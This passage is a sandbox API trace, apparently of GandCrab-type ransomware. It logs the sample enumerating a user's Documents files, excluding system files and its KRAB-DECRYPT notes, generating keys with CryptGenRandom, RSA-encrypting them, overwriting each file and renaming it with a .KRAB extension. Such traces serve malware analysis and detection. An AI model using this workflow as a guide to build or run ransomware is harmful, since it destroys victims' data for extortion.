dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.951] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.951] lstrcmpW (lpString1="Pql49pC_7UmpR7.pptx", lpString2=".") returned 1 [0091.951] lstrcmpW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="..") returned 1 [0091.952] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="Pql49pC_7UmpR7.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Pql49pC_7UmpR7.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Pql49pC_7UmpR7.pptx" [0091.952] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.952] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Pql49pC_7UmpR7.pptx.KRAB") returned 56 [0091.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Pql49pC_7UmpR7.pptx") returned 51 [0091.952] lstrlenW (lpString=".pptx") returned 5 [0091.952] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.952] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pptx ") returned 6 [0091.952] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.953] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Pql49pC_7UmpR7.pptx") returned 51 [0091.953] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Pql49pC_7UmpR7.pptx") returned 51 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="desktop.ini") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="autorun.inf") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="ntuser.dat") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="iconcache.db") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="bootsect.bak") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="boot.ini") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="ntuser.dat.log") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="thumbs.db") returned -1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="ntldr") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="NTDETECT.COM") returned 1 [0091.953] lstrcmpiW (lpString1="Pql49pC_7UmpR7.pptx", lpString2="Bootfont.bin") returned 1 [0091.953] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.954] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10112c0) returned 1 [0091.954] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.955] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.955] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.955] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0091.956] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0091.956] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.956] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10111b0) returned 1 [0091.957] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.957] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.957] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.957] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0091.957] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0091.957] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.961] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0091.961] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0091.961] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.961] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.962] GetLastError () returned 0x0 [0091.962] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0091.962] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0091.962] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0091.962] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd5a0) returned 1 [0091.962] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.962] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.963] GetLastError () returned 0x0 [0091.963] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0091.963] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0091.963] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Pql49pC_7UmpR7.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\pql49pc_7umpr7.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.963] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.964] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.965] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x9611, lpOverlapped=0x0) returned 1 [0091.983] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff69ef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.983] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x9611, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x9611, lpOverlapped=0x0) returned 1 [0091.984] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0091.984] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.988] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.988] CloseHandle (hObject=0x434) returned 1 [0091.989] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.989] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Pql49pC_7UmpR7.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\pql49pc_7umpr7.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Pql49pC_7UmpR7.pptx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\pql49pc_7umpr7.pptx.krab")) returned 1 [0091.990] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.990] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.990] lstrcmpW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2=".") returned 1 [0091.990] lstrcmpW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="..") returned 1 [0091.990] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="QImaw2GHVdQy7N2Eh.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QImaw2GHVdQy7N2Eh.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QImaw2GHVdQy7N2Eh.xlsx" [0091.990] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.990] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QImaw2GHVdQy7N2Eh.xlsx.KRAB") returned 59 [0091.991] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QImaw2GHVdQy7N2Eh.xlsx") returned 54 [0091.991] lstrlenW (lpString=".xlsx") returned 5 [0091.991] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.991] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0091.992] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.992] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QImaw2GHVdQy7N2Eh.xlsx") returned 54 [0091.992] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QImaw2GHVdQy7N2Eh.xlsx") returned 54 [0091.992] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="desktop.ini") returned 1 [0091.992] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="autorun.inf") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="ntuser.dat") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="iconcache.db") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="bootsect.bak") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="boot.ini") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="ntuser.dat.log") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="thumbs.db") returned -1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="KRAB-DECRYPT.html") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="ntldr") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="NTDETECT.COM") returned 1 [0091.993] lstrcmpiW (lpString1="QImaw2GHVdQy7N2Eh.xlsx", lpString2="Bootfont.bin") returned 1 [0091.993] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.993] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0091.994] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.994] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.994] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.994] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0091.994] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0091.995] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.995] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0091.995] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.996] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.996] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.996] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0091.996] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.996] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.996] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10111b0) returned 1 [0091.997] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0091.997] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.997] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.997] GetLastError () returned 0x0 [0091.997] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0091.997] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0091.997] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0091.998] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd620) returned 1 [0091.998] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0091.998] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0091.998] GetLastError () returned 0x0 [0091.998] CryptDestroyKey (hKey=0xfbd620) returned 1 [0091.998] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0091.999] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QImaw2GHVdQy7N2Eh.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\qimaw2ghvdqy7n2eh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.000] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.000] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.000] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x14645, lpOverlapped=0x0) returned 1 [0092.015] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffeb9bb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.015] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x14645, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x14645, lpOverlapped=0x0) returned 1 [0092.015] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.015] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.020] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.020] CloseHandle (hObject=0x434) returned 1 [0092.021] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.021] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QImaw2GHVdQy7N2Eh.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\qimaw2ghvdqy7n2eh.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\QImaw2GHVdQy7N2Eh.xlsx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\qimaw2ghvdqy7n2eh.xlsx.krab")) returned 1 [0092.022] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.022] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.022] lstrcmpW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2=".") returned 1 [0092.022] lstrcmpW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="..") returned 1 [0092.022] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="rWV5CvNxEpNqx0.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rWV5CvNxEpNqx0.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rWV5CvNxEpNqx0.xlsx" [0092.029] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.030] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rWV5CvNxEpNqx0.xlsx.KRAB") returned 56 [0092.030] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rWV5CvNxEpNqx0.xlsx") returned 51 [0092.030] lstrlenW (lpString=".xlsx") returned 5 [0092.030] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.030] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0092.030] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.031] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rWV5CvNxEpNqx0.xlsx") returned 51 [0092.031] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rWV5CvNxEpNqx0.xlsx") returned 51 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="desktop.ini") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="autorun.inf") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="ntuser.dat") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="iconcache.db") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="bootsect.bak") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="boot.ini") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="ntuser.dat.log") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="thumbs.db") returned -1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="KRAB-DECRYPT.html") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="ntldr") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="NTDETECT.COM") returned 1 [0092.031] lstrcmpiW (lpString1="rWV5CvNxEpNqx0.xlsx", lpString2="Bootfont.bin") returned 1 [0092.031] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.031] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0092.032] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.032] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.033] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.033] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0092.033] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0092.033] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.033] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0092.033] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.034] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.034] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.034] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0092.034] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0092.034] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.035] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011458) returned 1 [0092.035] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0092.035] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.035] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.036] GetLastError () returned 0x0 [0092.036] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0092.036] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0092.036] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010f08) returned 1 [0092.036] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0092.036] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.036] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.037] GetLastError () returned 0x0 [0092.037] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0092.037] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0092.037] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\rWV5CvNxEpNqx0.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\rwv5cvnxepnqx0.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.037] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.039] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.041] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x15c0a, lpOverlapped=0x0) returned 1 [0092.055] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffea3f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.056] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15c0a, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x15c0a, lpOverlapped=0x0) returned 1 [0092.056] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: 